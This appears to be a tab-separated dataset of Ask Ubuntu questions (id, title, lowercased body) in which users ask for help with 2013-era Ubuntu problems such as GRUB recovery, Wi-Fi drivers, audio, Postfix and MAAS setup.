370836	microphone noise and problems	first thing to say : i am not an expert on computer issues , i am just a regular user ( a windows former user just getting used to ubuntu ) os : ubuntu 12.04 computer : asus x201e-dh01 soundcard : hda intel pch my internal microphone has very low sound and creates a noise that is giving me hard times on skype and hangout calls . this computer has a combo mic/headphone jack and i am trying to use an iphone headset to improve my microphone sound , but my computer does n't recognize the microphone on the headset , just the output . i have been trying to find an answer for my question here 5 but nothing seems to work . anyway when the instructions get too technical i am not able to follow them . any ideas ? i want to thank you in advance
370842	laptop touchscreen stopped working in xubuntu 13.10	i 've been using the xfce desktop for about a week now , and my touchscreen worked fine in it at first . however , it has stopped working in xfce , although it still works in unity . i 'm using an asus q301l .
370844	error in loads of programs	i 've been getting a recurring error after using lubuntu and trying to install a font . python : /build/buildd/cairo-1.12.16/src/cairo-scaled-font.c:459 : _cairo_scaled_glyph_page_destroy : assertion ` ! scaled_font- > cache_frozen ' failed . this is the gist of it . not a clue what i did wrong . but i ca n't use lubuntu anymore and had to go back to ubuntu 13.10 . any ideas ? i tried clearing font cache and lot .
370846	optimizing ubuntu dualbooting from pendrive ( running from ram and virtual swaps )	what i want : i want to install ubuntu on a usb pen drive completely independent of the windows partition schemes , but i want it to run fast . ie : when pdrive is not inserted , boot windows and nobody knows i use linux ; when pdrive inserted boot ubuntu ( setting the bios to use pdrive when it is present ) || problem : because the pen drive is slow ubuntu loads file/applications to and from the pen drive and/or the swap partition on it . only the loading of libraries for active applications ( maybe some setting files written once in a while also ) make the most semnificative impact on the oss ; it seems that swapping ( on my 6gb , 4x2.4ghz computer ) never takes place ( which is good , since pdrive swap is awfully slow ) . firefox is extremely slow for example , freezing 5s every 20s if i am installing stuff ( which i do everytime i install the os ) and 5s every 60s if i am not but have 5tabs open = pain the f*cking neck || my solution : 1 i can use truecrypt to make a virtual swap partition ( since they do not affect the hdd noone can tell i am using a diferent os ) on the windows hdd which would speed up the swapping incredibly much but what about the application loading from the pen drive since hdd swap speed ( even with decryption is 10x faster ) 2 thx to blankreg for these commands ( though i want to go into more detail about them ) 3 boot to ram 4 preload is useless with boot to ram || || || || what other ways of optimizing such a configuration ? thx blankreg for this great information , i would also like to add the preload package works wonders
370847	no sound on ubuntu after altering settings on gstreamer properties	the sound was working perfect , but then i installed gstreamer via terminal to fix my webcam . from that moment the only sound i get is at the startup . it detects my speaker fine but does n't play any sound once i login . it works perfectly on guest account . i tried to find some solutions but none of them worked . gstreamer-properties on the terminal had launched multimedia systems selector . i had altered some settings on the input and output field . the sound is not working since then . and i can not remember the initial settings .
370849	snapshot of certain user home directory every 12 hours	i have a build server that builds our comnay product in a continuous build method . the build user is called build ( surprise , surprise , i know : - ) ) and most of the data that it uses is simply taken from git and svn , including the builder code itself , there are however several configuration files like our joblist and several more that are dangling out there with no real backup . for the time being i 've placed them on a private git repo on one server , we have 3 active servers . the question i have is can i activate on ext4 ( ubuntu 12.04 lts ) a 12 hours snapshot of the root of the home directory ( no need for the rest ) ? i know solaris used to have the ability to `` go back in time '' to a week or so in small snapshots of 5-10 minutes in the ops in real time , really cool : - ) i was wondering if it exists with ext4 and how to use it ?
370852	kubuntu 13.10 can not increase guest qxl resolution	i have host and guest kubuntu 13.10 64bit installations . vm is created through virt-manager . the problem is that for the guest the monitor is identified correctly as qxl but have only 1024x768 resolution . if i set the video resolution to 1440x960 , the virtual monitor shows only part of screen . in the host virt-manager shows a qxl monitor with 64 mb of ram ( i can not change anything ) another vm with kubuntu 13.04 changes correctly rhe resolution of the screen ( 1440x960 ) anyone knows how to increase the qxl monitor resolution ?
370853	new desktop effects in gnome 3.8	i 'd like to turn off the new desktop effects in gnome 3.8 - i.e . the animation applied to all dialog windows , and the zoom in effect after logging in . i know i can use gsettings to disable all desktop effects , but i 'd like to retain most of them ( shadows , overview and workspace switching , for example . ) unfortunately in gnome there does n't seem to be a way to customize them ( unlike unity ) . i tried to edit a few variables in /usr/share/gnome-shell/js/ui but i 'm not knowledgeable enough . your help is greatly appreciated : )
370855	boot-repair no os found	hi i have installed ubuntu on a machine that previously dual-booted into windows 8 and ubuntu . previously turning off secure boot and running boot-repair sorted out the boot and got me a grub menu . with this frsh install it has n't worked . any help would be appreciated : this is the boot-repair output : boot-repair output thanks !
370857	ca n't adjust screen brightness on macbook pro 10,1 ubuntu 13.10	i recently installed ubuntu on my retina macbook pro ( following this great guide ) . everything works fine so far however the screen brightness / backlight can not be adjusted neither by using the assigned key nor by any other means . i know , i 'm not the first to address this problem , but all the suggested solutions i found so far did not work for me . i unsuccessfully tried the following : including option registrydwords '' `` enablebrightnesscontrol=1 in the devices section of /etc/x11/xorg.conf the application xbacklight i also have n't found any file such as mbp_backlight or apple_backlight on my system which probably would be a starting point . i 'm using the nvidia-driver . ( btw : with the nouveau-driver , the keys to adjust the brightness work . however , with the nouveau driver ubuntu does not resume from suspend mode ) any suggestions what i can do ? thanks !
370861	can someone recommend me a backup solution that can be used for an educational institution ?	the online university where i study is constantly experiencing data loss , including studentsâ files and literature , so i want to recommend them an effective solution .
370868	( solved ) custom desktop file execution fails without any errors	i have made a custom .desktop file for a bittorrent client named vuze . i have verified that the 'exec ' entry in the file is working , as given here running a .desktop file in the terminal the shortcut even shows up in the dash . but when i try to open it by clicking or double clicking , it simply does n't work . and when i tried to run the .desktop file with xdg-open , it opens the file in a text editor . please help edit : i made a workaround , rather than executing the symbolic link to the program , i made a wrapper script that now runs the program from the program 's directory .
370871	backup my data from broken ubuntu	during upgrade ubuntu 11.10 i have lost power . i cant make recovery mode or grap and when try to boot from life cd i got this message : can not mount /dev/loop0 ( /cdrom/casper/filesystem ) i only want copy my data . how can i do that ?
370872	selinux is not enabled due to missing policies	i installed selinux on the ubuntu desktop 13.10 . the /etc/selinux/config status is selinux=enforce ăselinuxtype=ubuntu . i can not use setenforce command change the status , then prompt setenforce : selinux is disabled . in the shutdown of selinux tipsďź if you are not already running selinu , then you can safely ignore the following error message . selinux : could not downgrade policy file /etc/selinux/ubuntu/policy/policy.28 search for older version . selinux : could note open policy file /etc/selinux/ubuntu/policy/policy.28 : no such file or directory . /usr/sbin/load_policy : ca n't load policy : no such file directory . selinux ubuntu policy relabel is required . relable could take a very long time , depending on file system size and speed of hard drives . the file /etc/selinux/ubuntu/policy/policy.28 permissions is 644. please help me !
370875	workspeace view shows first workspaces out of border at left	i am using nvidia-current and edited from settings my monitors so that my second monitor is at left and unity-panel shows only in my main monitor . how ever now the workspaces images have shifted so that second monitor first workpsaces are moved out of the left border and when the monitor is not turn on i ca n't see the the workspaces there . sometimes programs have been moved when monitor is been flashed to the workspace shown in out of border and i have no means to move the program windows into my main workspace views . image : as you see the second monitor works as it should work but my main monitor is fooked . is this possible way to fix this some how ?
370876	problem with nautlius -q	when run this command in terminal : nautilus -q it shows these i thought last line is an error how i could solve it ? intializing nautilus-pastebin extension ... initializing nautilus-open-terminal extension initializing nautilus-dropbox 1.4.0 sys:1 : warning : g_object_set : assertion 'g_is_object ( object ) ' failed
370877	space between windows in ubuntu when placing them side by side ctrl+super+left/right	when i put two windows side by side with ctrl+super+left/right there is a small space between both windows where i see the desktop wallpaper , it 's kind of annoying and i have n't been able to figure out how to eliminate it or at least reduce it a bit . i 'm using ubuntu 13.10 .
370881	corrupted 7z file	i recently wanted to try out fedora . so i transfered all my files to it via usb . then i got frustrated with it , placed all my files in a 7z archive and then copied them back to the drive . now , every time i try to open the archive , `` an error occurred while loading the archive '' thanks for your help [ edit ] there is no password on the archive . ls -alf file.7z -rw-r -- r -- 1 jesse jesse 2422670837 nov 3 22:58 file.7z 7z t file.7z 7-zip [ 64 ] 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 p7zip version 9.20 ( locale=en_us.utf-8 , utf16=on , hugefiles=on,4 cpus ) processing archive : jesse.7z error : can not open file as archive $ 7z l file.7z | head -15 7-zip [ 64 ] 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 p7zip version 9.20 ( locale=en_us.utf-8 , utf16=on , hugefiles=on,4 cpus ) error : jesse.7z : can not open file as archive errors : 1
370883	ubuntu 13.10 japanese keyboard layout intercepts caps lock	i 've installed ubuntu 13.10 ( clean install on new machine ) , there are lot of changes for configuring keyboard layouts and i 've tried to configure it as i 've used earlier : englis ( us ) , russian and japanese ( anthy ) with switching between them with caps lock key . caps lock switching works fine between russian and english and vice-versa , but with japanese i can switch only to japanese ( not from ) , in japanese layout caps lock starting to work as usual caps lock ( as a switch between small and big letters ) , so i need to use mouse to switch back to ru or en layout . this happens only with japanese layouts ( i 've tried also simply `` japanese '' and `` japanese ( kana ) '' ) , not with chinese , korean or anything else . i 'm not sure who is blame for that , is it ibus-anthy or anything . please help , i want to use caps lock to switch between all layouts . also , i 've created a bug in the launchpad : https : //bugs.launchpad.net/ubuntu/+source/gnome-settings-daemon/+bug/1247363
370890	segeo ui font problem	i want to know the actually steps to install segoe ui font on ubuntu 13.04 , i copied segoe*.ttf manually to `` /usr/share/fonts '' and `` /usr/share/fonts/msttcorefonts '' and the used `` fc-cache -f -v '' commend . however the font does n't appear in liberoffice or in browsers and can not use it can any one help please ! thanks in advance
370891	c printf not working on ubuntu 13.10 terminal	i 'm new in ubuntu so please bear with me . i need to create a c based program for a course in my university . i was using opensuse as the os and konsole as the terminal emulator when i was in the university 's lab . so basically i need to install opensuse on my system or use a vm to do so . but i feel lazy to do that , so i tried to run it on my ubuntu instead of opensuse . however , no c code seems working on ubuntu 's terminal . the compiling is success , but its not running , or at least the printf is not running . this is my code , a very very simple one : # include < stdio.h > # include < unistd.h > # include < stdlib.h > int main ( ) { printf ( `` test '' ) ; return 0 ; } when i compile it with gcc test.c -o test everything works fine and i get an executable file . then i try to run it by ./test , but the printf is not printed . no error or warning was shown . am i missing something ? note : my gcc is the new one , it should has no problem .
370892	wifi and wired connection not working in ubuntu 12.10	am using dell 3460 laptop with dual boot 1 ) windows 7 64bit and 2 ) ubuntu 12-04 64bit . but network is not working in ubuntu , i reinstalled ubuntu and tryed with ubuntu 12.04 32 bit also it is not working . windows 7 it is working fine . please help me
370894	media keys play/pause globally worked in 12.10 , not in 13.10	laptop media keys on asus n55sf laptop , there are a dedicated keys for volume up , volume down , mute , [ play/pause ] , stop , launch ( plus a dozen fn-key combinations ) . in 12.10 most worked . ( overall is seems unrelated to desktop environment used , stating it for the sake of completeness . ) on ubuntu 12.10 under xfce they just worked . that is : when a player like rhythmbox or totem was started , it would alternate between play and pause . interestingly , if several were started , they would alternate independently . e.g . use mouse to pause rhythmbox , launch totem , and one hit on [ play/pause ] key would pause one and resume the other . keys next , previous and stop worked as expected in any program . in 13.10 most still work , but play/skip related ignored . on xubuntu 13.10 ( xfce too ) the volume keys work but the [ play/pause ] , stop , next and prev are ignored . not tried regular ubuntu 13.10 ( unity ) . search before you ask here are a few facts : https : //wiki.ubuntu.com/hotkeys/architecture is ummutable and mentions ubuntu 9.10. https : //wiki.ubuntu.com/hotkeys/troubleshooting is also outdated as it mentions /usr/share/doc/udev/readme.keymap.txt which no longer exists . on 12.10 and 13.10 versions , at xfce level ( as visible by xfconf-query or using xfce4-settings-manager ) there are a couple of shortcut for keys like xf86calculator or xf86touchpadtoggle but nothing related to volume prev/next/play/stop , which is okay . xf86audio substring does n't appear in /etc ( which is normal ) kernel-level test : `` showkey -s '' on console shows that keys next , play/pause , previous , stop are keycodes 163,164,165,166 . nothing relevant in /etc about that . reports https : //bugs.launchpad.net/ubuntu/+source/udev/+bug/1072371 and https : //bugs.launchpad.net/ubuntu/+source/systemd/+bug/1012365 suggest to adjust at udev level . alas , the udev tutorials i found ( e.g . https : //wiki.debian.org/udev ) do n't even mention keyboard . a thread in french seems to deal with a similar issue : https : //forum.ubuntu-fr.org/viewtopic.php ? id=1395051 . sudo evtest /dev/input/event3 , in x as well as on plain console , reports events on key pressed and repeats , but nothing when pressing those media keys . is udev a dead end ? questions how did it work in 12.10 ? through udev ? something else ? any other hint ?
370896	how to install a 3g dongle on ubuntu	i have a 3g dongle of lava and i am not able to install it on my ubuntu os . when i plug it in does not even recognize it , although the dongle has installation setup for linux also . so how do i use internet on ubuntu using a 3g dongle ? i even tried out the 3g dongle of tata docomo . i need to get software for my pc to listen songs and watch movies . without net the os is useless . i clicked on the network icon on the right corner and then on vpn connections to set up and mobile broadband connection by providing the necessary info . at the end of all the stuff i entered the password for allowing it to install , but there was an error . what am i supposed to do ?
370898	is the search bar in desktop unity 8 really going to be on the right side ?	i noticed that , at least in the tablet version of unity 8 , the search bar is on the right side of the screen . however , people keep telling that the desktop version will come afterwards , so i do n't know if that 's the intended place for it to be across versions . i hope not , because it 's a major ui problem . this is the way windows 8 does it , and it 's terrible , because as you type on it ( on the right side ) , the results appear on the left side , so your eyes have to move across the screen all the time , especially if your screen is a large one . i know one can ask `` but is n't that where search bars have been all along ? firefox and windows explorer etc . well , not quite . on these programs , it 's intended that you finish your search key and then type enter and only so look for the results . unity 's search bar , however , shows results dynamically , so you always want to look at the results , so you know if you can press enter without having to write the whole sentence , and you also want to look at what you 're typing , so you know there are no typos . that being said , i wanted to know if this is really where the search bar will be and if it will not spread across the top part of the screen ( that would be a good solution , since `` home scope '' and other scope titles do n't need to be showing when you 're typing ) . if that 's final , then i will fill a bug .
370899	how to change wireless password from text mode ?	i searched for other answers and came up with this , how can i change the wireless pasword from the terminal ? it uses gksudo , but i want to do it in text mode of ubuntu . i.e no graphics . i am using ubuntu 12.04 .
370901	unable to come out from grub prompt	i have 160 gb hard disk , in that i installed ubuntu , windows 7 , and windows xp each in different partitions , windows xp is last one which i installed , after installation i am able to boot directly into windows xp , to get back with grub menu for windows 7 and ubuntu i installed grub boot loader then it is directly went in to memory test . now i boot with live cd and deleted all files in boot folder in ubuntu installation partition and again reinstalled grub boot loader into ubuntu installation . now i am prompted with grub command prompt and struck here ... ... please help me with this thank you arjun
370906	unable to see files in dvd hidden using windows 7	i had hidden folders using windows 7 and burned them to a dvd . when i checked the disk in windows it showed all the folders ( using 'show hidden files and folders ' ) . but after performing a clean install of ubuntu 13.10 over windows i can not see the hidden folders using nautilus ( ctrl+h does not help ) or any terminal commands . i badly need the data as it is important . presently i do not have access to a windows pc .
370907	broken ubuntu 13.10 installation	i upgraded from 13.04 to 13.10 and shutdown my computer and now it boots to a blank screen everytime . the only thing there is a cross shaped cursor . i can boot to terminal using ctrl+alt+f1 . boot repair did nothing ( paste.ubuntu.com/6358039 ) and when i tried to re-install using a live cd the installation was not detected so i have no option to keep my files . is there anyway i can repair without losing my files in my home folder ? thanks .
370910	recovering grub after installing windows 8.1	i installed windows 8.1 after ubuntu 12.04 . now , grub does not shows up any more ! it 's goes straight to windows after turning my pc on . grub gone after installing windows 8.1 please tell me what should i do to turn grub back ? any helps would be awesome .
370912	ubuntu broke my windows boot	i was installing ubuntu on pendrive and once finished i needed to run windows a bit , even though i chose erase and install on the pendrive it altered my hdd boot sector when i remove the ubu cd and pendrive it should only boot from hdd ( windows ) but it gives error : no such device : blablabla ( numerbes and letters ) grub rescue > _ if i place the pendrive inside it asks me whether to start windows or linux ( windows works here ) i need to run windows without the pendrive , how can i remove grub from the hdd and also run ubuntu from the pendrive ( once i remove grub from the hdd ) || thx ark , your information help me do wonders ! : ) || now ... it seems that without grub i can not boot the ubuntu from the pendrive anymore , blank screen and nothing loads ( i did check the ubuntu with the grub from the hdd , and everything inside it worked perfectly ( except the clock , it didnt find my local hour ... ) ) new problem : it seems that grub which is now on the pendrive is always asking me whether to boot from windows or ubuntu of course i want to boot ubuntu otherwise i would stick the pen inside the computer
370916	fatal error while installing the grub loader on the live usb/cd ( 12.04 precise pangolin )	i think you can understant everything in the title of my question . here , i need to know why i can not install properly ubuntu 12.04 ( and i tried kubuntu 12.04 and 13.04 too ) . months earlier , i used to able to kubuntu 12.04 and it worked like a charm . now i have this error about grub-install fatal error while installing , and says it will send a report to the ubuntu developpers . so i am very confused right now . id of my machine : asus x550c hdd : 750 gb processor : intel inside pentium ( x2 - 1.80 ghz ) ( 64-bit x64 ) os installed : windows 8 / debian 7.1 trying to install : ubuntu 12.04 and kubuntu 13.04 ( raring ringtail ) thank you for your time and comprehension . regards , the drummer from kubuntu
370917	boot problem grub rescue error shows in ubuntu	i have two operating system , one is ubuntu & othet is windows7 . when i am open my system , i saw a problem '' error : unknown filesystem . grub rescue > '' how to solve this problem ?
370918	problem with apt	when i run the apt-get upgrade command . so i follow the step and run apt-get -f install if i remove libc-2.17.so from '/lib/i386-linux-gnu ' as the instruction says , my sudo command stops working sudo dpkg -- configure -a also does n't work .
370919	kernel panic-not syncing ( ubantu 13.04 )	today i was trying to install unbantu 13.04 on my asus e notebook . i changed the boot priority from hdd to my bootable usb , and saved the setting.the starting window of ubantu appeared for a few second but then an error message showed up saying `` kernel panic-not syncing'.i had windows xp installed in it but then it stopped working.before windows xp i had ubantu 13.04 and i used the same bootable pendrive to install it from which i was trying to instal ubantu today.should i download an older version of ubantu ? windows is repeatedly getting corrupt on my asus e notebook but ubantu was working absolutely fine .
370922	intel graphic 945 driver for ubuntu 12.04 lts	i 'm new to the forum , and ubuntu as well . i have installed the ubuntu 12.04 lts along with the windows 7 , the installation went fine . but the problem is i can not install my graphic driver . i have intel 945.i searched in the site also and found that its driver is obsolete so anyone please help me to install my graphic driver . thank in advance .
370923	how do i find time elapsed from boot loader to shell ?	motivated by this report regarding fastest boot up time , i am curious to know these numbers i.e time elapsed from boot loader to shell , on my ubuntu 12.04 running on a atom processor . how do i look at these numbers . i tried to find these timing information in log file but it is some thing like this : /acme # nano /var/log/boot.log fsck from util-linux 2.20.1 /dev/loop0 : clean , 173695/1119232 files , 3426100/8953856 blocks * starting uncomplicated firewall^ [ [ 74g [ ok ] * starting mdns/dns-sd daemon^ [ [ 74g [ ok ] * starting configure network device security^ [ [ 74g [ ok ] * starting configure network device security^ [ [ 74g [ ok ] * starting bluetooth daemon^ [ [ 74g [ ok ] * starting configure network device^ [ [ 74g [ ok ] * starting mount network filesystems^ [ [ 74g [ ok ] * starting upstart job to start rpcbind on boot only^ [ [ 74g [ ok ] * starting failsafe boot delay^ [ [ 74g [ ok ] * stopping upstart job to start rpcbind on boot only^ [ [ 74g [ ok ] * starting userspace bootsplash^ [ [ 74g [ ok ] * starting send an event to indicate plymouth is up^ [ [ 74g [ ok ] * stopping mount network filesystems^ [ [ 74g [ ok ] * starting bridge socket events into upstart^ [ [ 74g [ ok ] * starting configure network device^ [ [ 74g [ ok ] * stopping failsafe boot delay^ [ [ 74g [ ok ] * starting rpc portmapper replacement^ [ [ 74g [ ok ] as you can see no timing information is presented . what command/file should be used then to get timings at various events ?
370924	wifi needs reconfiguring again	i recently installed ubuntu 13.04 with dualboot setup on a pre-installed windows 8 sony vaio laptop.i went to additional drivers under software and updates found the broadcom 802.11 linus sta driver.enabled it wifi came , switched off the pc tried again and wifi gone.whatever guide on this i found on net worked for the while system was on and once switched off i loose access to wifi again ( not showing enable wifi ) .when i went to additional drivers it shows that this `` device is not working '' or this device is using `` an alternative driver '' . by hook or crook searching about broadcom sta drivers i get them to work but again after rebooting the wifi is lost.i really dont want to reinstall ubuntu as i already had a hardtime defeating windoes 8 uefi stuff.please any way i get wifi settings or network setting to default and then finally able to cleanly access wifi everytime in ubuntu also wifi works normal on windows 8 .
370925	postfix wo n't send emails on my lab server	hello to all and thanks for reading . running a live ubuntu server 12.04.3 , with wordpress , xampp , and postfix . i have recently installed a lab server in our office ( on a macmini1.1 ) using the same installation process as the live server . i 've fixed every issue along the way but one . postfix refuses to send emails . for the explanation i 'm going to use this example info : website ( set the same both on the live & the lab ) : www.mywebsite.co.il live ip address : 6.111.222.77 lab ip address ( in the lan ) : 192.168.2.32 our support email address : support @ mywebsite.co.il my sudo dpkg-reconfigure postfix configuration is : general type of mail configuration : internet site system mail name : mywebsite.co.il root and postmaster mail recipient : support @ mywebsite.co.il ( i 've also tried moishe @ mywebsite.co.il ) other destinations to accept mail for : mywebsite.co.il , localhost.co.il , localhost force synchronous updates on mail queue ? no local networks : 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 192.168.2.32/24 ( i 've also tried : 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 as i remember it being the default . i realized through the hosts file that `` : :1 '' is the ipv6 localhost , and we use ipv4 so i assumed the proper one is the lan address ) mailbox size limit : 0 local address extension character : + internet protocol to use : ipv4 i of course restarted the xampp ( sudo /opt/lampp/lampp restart ) and even reloaded the postfix ( sudo /etc/init.d/postfix reload ) after configuring the postfix . one issue i 've already fixed was this error message : warning : /etc/aliases exists , but does not have a root alias '' . i will gladly explain how i fixed it if it matters for the troubleshooting of my situation . the file /var/log/mail.err1 on my lab server contains the following : oct 31 12:41:30 mywebsite postfix [ 5377 ] : error : to submit mail , use the postfix sendmail command oct 31 12:41:30 mywebsite postfix [ 5377 ] : fatal : the postfix command is reserved for the superuser reverse dns shows the ip address of the live server . i have also made a few fixes to lampp before even installing postfix , but i assume they are not relevant here ( if they are , i 'm willing to share the info ) . i 'm very confused as to sendmail , as i 've seen people say i should n't install it if i have postfix because it runs postfix over , and because postfix is a replacement to sendmail anywayâś or somethingâś ... very confused . i have tried several troubleshooting guides from several different sites . if needed , and if allowed in this forum , i will gladly supply links . how do i troubleshoot this ?
370929	using .bin files	hello i have around 20 video files that i bought off an online tutorial website . in the introductory tutorial they said that you can play the .bin files using daemon tools . but how about linux ? daemon tools is not available for linux so what must i do ? is their any equivalent or alternative way of playing .bin files ? also these bins , upon mounting , will open up in a browser utilizing activex content . is it possible to achieve this with java in firefox ?
370931	how do i remove unnecessary entries from refind ?	i recently replaced linux mint with xubuntu . i 'm using the refind boot loader installed from windows 8 . the problem is that after i removed mint , i can still view an entry in refind with mint 's icon and this line below it : boot efi\linuxmint\grubx64.efi from system and i got another 4 new ubuntu icons after i installed xubuntu : boot efi\ubuntu\grubx64.efi from system boot efi\ubuntu\shmix64.efi from system boot boot\vmlinuz-3.11.0-12-generic.efi.signed from 14 gib ext4 volume boot boot \vmlinuz-3.11.0-12-generic from 14 gib ext4 volume how can i remove all the unnecessary entries and just leave xubuntu and windows 8 ?
370941	is it possible to install ubuntu / iso via a local hard disk with no os ?	my netbook does n't come with a cd/dvd player and i do not have a thumb drive either ( i 'm located at rural area ) . os is broken and formatted , not i have a blank hdd with no os , no cd player or thumb drive . any idea how do i install ubuntu/kubuntu ? oh my netbook comes with an sd card reader and i have a working one .
370944	remap fn key to insert key on apple aluminium keyboard	how to hack apple keybaord model a1243 ( aluminium keyboard ) to have insert key on fn button ? i 've updated system to kubuntu 13.10 and my keyboard stop working as usual . i 've read https : //help.ubuntu.com/community/applekeyboard and function keys in apple keyboard do n't work as expected , tried echo 2 > /sys/module/hid_apple/parameters/fnmode without success . i do n't want to remap f13 to insert , or use fn+enter as insert . on my last system ( 12.04 or earlier ) fn as insert was working , but i can not remember how i 've hack it ... xev does n't even report fn key . can anyone help me ?
370946	creating file 1c9e:98ff for vkom 3g modem	in order to install this i need to first create the above file , and well being new to ubuntu , i do not know how , a step by step guide will be greatly appreciated .
370953	how can i install amd ati catalyst display driver on kubuntu 13.10	just like in a title . is there a way of getting it working on kubuntu 13.10 ? i have already tried doing it through the software & updated - > additional drivers .
370955	disable loading images in firefox	firefox had traditionally a tab content in preference menu and there was option for disabling automatic image loading and controlling the feature . however , it seems that the option is removed from recent version of firefox . my question is , is there any way to disable auto-loading of images in firefox ? ( without using additional extensions )
370957	how to prevent a process from being killed ?	is there anyway to prevent a process from being killed no matter what ? i know about nice but i 'm not sure if giving a task such as a long running memory-intensive rake task the highest priority will prevent it from being killed off : nice -n -20 rake xyz
370962	wrong disk geometry on usb enclosure	i have a sata disk formatted in a nas that use it in linux raid 1 . i have removed the disk from the nas ed mounted it internally in a pc with linux . linux correctly recognize the disk and i 'm able to assemble the raid and mount partitions . fdisk correctly give me : root @ ubuntu : /home/ubuntu # fdisk -l /dev/sde disk /dev/sde : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sde1 2048 4196351 2097152 fd linux raid autodetect /dev/sde2 5244928 1953497087 974126080 fd linux raid autodetect /dev/sde3 4196352 5244927 524288 fd linux raid autodetect the problem is i need to use it inside a usb sata external enclosure . i have installed the same disk on the external enclosure e connect the usb to the linux pc . but now fdisk report a wrong disk geometry : root @ ubuntu : /home/ubuntu # fdisk -l /dev/sde disk /dev/sde : 33 mb , 33348608 bytes 2 heads , 32 sectors/track , 1017 cylinders , total 65134 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sde1 2048 4196351 2097152 fd linux raid autodetect /dev/sde2 5244928 1953497087 974126080 fd linux raid autodetect /dev/sde3 4196352 5244927 524288 fd linux raid autodetect partition table entries are not in disk order and i 'm not able to assembly the raid and mount partitions . how i can solve this ? thank you
370964	problem with mozilla firefox ( tabs )	i had opened several tabs in the mozilla browser but when press the cross button i 'm unable to close the tab . how can i close them safely.thanks in advance .
370969	why some website ( yahoo.com , alibaba.com , prothom-alo.com ... ) not loading in my ubuntu 12.04 ?	even when i connect my internet showing this notification : network service discovery disabled your current network has a .local domain , which is not recommended and incompatible with the avahi network service discovery . the service has been disable .
370970	ubuntu download for intel system	i am running an intel built machine but the 13.10 download file has amd on it . will this cause me any issues when trying to install 13.10 on the machine ? is there an intel specific download ? thank you .
370971	ubuntu 13.10 server + maas : pb to import boot images	before i try to install an ubuntu maas server on a real machines and add 1 or 2 nodes , i wanted to test the ( ubuntu 13.10 + maas + juju + openstack ) solution with 2-3 vmware virtual machines ( under windows 7 pro 64-bit ) . so i created a small vmware vm ( 2 processors/2gb memory/60gb hard disk ) and installed the ubuntu maas server ( following the instructions on http : //maas.ubuntu.com/docs/install.html # import-the-boot-images ; everything except the dhcp/dns stuff ) ) . when connecting to the web interface , i followed the instructions : 1 ) i created the superuser ; 2 ) i clicked on the `` import boot images '' of the cluster controller . nothing happened . so i logged on the ubuntu server and ran the command maas-cli maas node-groups import-boot-images . nothing happened ( except a message saying that it started ) . by nothing happened , i mean that several hours latter , i still have the web interface telling me that there is no boot images . and no idea what happened because i have no idea where i could eventually find a log file/message . from a fresh ubuntu 13.10 server + maas install , i execute the following commands as specified in the manual : sudo maas createsuperuser maas-cli login maas http : ///maas/api/1.0 4a7ehdmkzwstdmscmx : kayppaul5wwjmjtamr : a5jlyz8wlnwahcpkgzjxqj73mqye5tns you are now logged in to the maas server at ... blablabla ... maas-cli maas node-groups import-boot-images import of boot images started on all cluster controllers ps -ae | grep maas and there is nothing to see there ... the maas page on the server still claim that there is no boot images imported .
370976	how do i debug the .net library from monodevelop ?	sometimes the .net libraries do not do what i expect them to do . the fault is probably mine , most of the times , but it would be really nice , if i could delve into the actual implementation by `` step into '' some misbehaving .net function . the source code is available , after all , so it should `` just '' be a question of figuring out how to set it up . i know how to run a dpkb-buildpackage - can i somehow tweak the ubuntu mono source package to get it to produce debuggable versions of the libraries ? i have tried moving some of the source codes into monodevelop projects - that was no success , the compilation issues are typically too complex . i am using kubuntu 13.04 , with mono 2.10.8.1-5ubuntu1 and monodevelop 3.0.3.2+dfsg-1build1 . thank you in advance for any answers .
370977	accidentally removed a drive shortcut from the launcher . how do i put it back ?	i 've got three partitions on my system , and i accidentally removed a shortcut to the first ubuntu partition from the launcher . how do i put it back ? ( at least , i assume it was a shortcut , as the partition is still here . they 're called shortcuts in ubuntu , right ? ) also , is there a way to rename my drives ? i keep getting confused as to which drive is which .
370978	looking for drivers for linux ubuntu 12.04 on hp pavilion 15-n028sg notebook-pc ( f2u88ea )	i bought hp notebook hp pavilion 15-n028sg notebook-pc ( f2u88ea ) - tried to install ubuntu 12.04 64bit - it doesnt install the graphic and i got the information i need special drivers for that . how can i get them ? thanks ... sara
370981	failure to upgrade to 13.10 on asus 1015e-ds03 -- i915-dkms fails to build	how should i proceed ? on my last step to reach 13.10 , after the download and installation and removal of unwanted packages , and after the reboot , i received this message : sorry , a problem occurred while installing software . package : i915-dkms the details revealed : package i915-dkms 0.1 [ origin : unknown ] problem type package title i915-dkms 0.1 : i915 kernel modele failed to build apportversion 2.12.5-0ubuntu2.1 architecture amd64 dkmsbuildlog dkmskernelversion 3.11.0-12-generic date sun nov 3 19:49:38 2013 dependencies distributionchanneldescriptor # this is a distribution channel descriptor # for more information see http : //wiki.ubuntu.com/distributionchanneldescriptor canonical-oem-annan-standard-precise-amd64-20130106-0 distrorelease ubuntu 13.10 installationdate installed on 2013-01-24 ( 283 days ago ) thanks for any help , bob pendleton
370988	how do i remove the floppy icon from nautilus since i do n't have such drive ?	i have been updating a machine that was using 11.04 to 12.04lts . the machine never had a floppy drive fitted , only cd/rw and usbs . yet , after install , the machine is showing floppy drive as a drive in home folder . the cd works , as its how i updated ! so how do i remove the fd link from home folder and replace it with cd instead . that is , it says floppy drive when it is in fact the cd drive ! ! ! ! i have n't gone back to that machine to work on it for a week or two and i have actually been wondering if i have the wrong power cable or have connected the cd to the wrong plug on the mother board ... will have to check .
